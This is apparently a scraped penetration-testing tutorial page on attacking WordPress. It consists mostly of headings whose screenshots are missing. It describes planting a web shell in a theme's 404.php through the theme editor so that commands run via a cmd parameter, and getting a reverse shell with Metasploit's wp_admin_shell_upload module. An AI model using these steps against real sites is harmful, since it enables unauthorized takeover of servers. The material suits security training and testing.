Exploitin
LFI in Plugin
Using Browser
We can also validate this vulnerability using cURL on the command line.
Using cURL
User Bruteforce
WPscan - XMLRPC
RCE via the Theme Editor
Attacking the WordPress Backend
Click on Appearance on the side panel and select Theme Editor. This page will allow us to edit the PHP source code directly. We should select an inactive theme in order to avoid corrupting the main theme.
Theme Editor
We can see that the active theme is Transportex so an unused theme such as Twenty Seventeen should be chosen instead.
Selecting Theme
Choose a theme and click on Select. Next, choose a non-critical file such as 404.php to modify and add a web shell.
Twenty Seventeen Theme - 404.php
In this example, we modified the source code of the 404.php page and added a new function called system(). This function will allow us to directly execute operating system commands by sending a GET request and appending the cmd parameter to the end of the URL after a question mark ? and specifying an operating system command. The modified URL should look like this 404.php?cmd=id.
RCE
Metasploit
To obtain the reverse shell, we can use the wp_admin_shell_upload module. We can easily search for it inside MSF:
MSF Search
Attacking WordPress with Metasploit
The number 0 in the search results represents the ID for the suggested modules. From here on, we can specify the module by its ID number to save time.
Module Selection
Module Options
List Options
Exploitation
After using the set command to make the necessary modifications, we can use the run command to execute the module.
Set Options
Last updated